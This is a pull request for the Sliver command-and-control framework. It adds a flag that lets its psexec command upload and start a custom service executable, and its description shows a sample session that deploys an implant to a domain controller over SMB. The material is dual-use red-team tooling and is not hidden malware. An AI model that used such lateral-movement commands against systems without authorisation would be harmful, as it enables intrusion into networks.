### PR TITLE
allow custom executables with psexec

### DIFF
--- a/client/command/commands.go
+++ b/client/command/commands.go
@@ -1196,6 +1196,7 @@ func BindCommands(con *console.SliverConsoleClient) {
 			f.String("d", "service-description", "Sliver implant", "description of the service")
 			f.String("p", "profile", "", "profile to use for service binary")
 			f.String("b", "binpath", "c:\\windows\\temp", "directory to which the executable will be uploaded")
+			f.String("c", "custom-exe", "", "custom service executable to use instead of generating a new Sliver")
 		},
 		Run: func(ctx *grumble.Context) error {
 			con.Println()


### PR DESCRIPTION
#### Card

Adds the `-c` flag to psexec to accept custom service executables instead of generating a new Sliver. The executable must respond to SCM messages.

#### Details

Using psexec to spawn a customized version of Sliver (with service handlers).

```
[server] sliver (test1) > psexec -c /tmp/sliver.exe -d test1 -s test1 dc.hackme.local

[*] Uploaded service binary to \\dc.hackme.local\C$\windows\temp\jTVgfmNXyn.exe
[*] Waiting a bit for the file to be analyzed ...
[*] Successfully started service on dc.hackme.local (c:\windows\temp\jTVgfmNXyn.exe)
[*] Successfully removed service test1 on dc.hackme.local

[New session received]
```
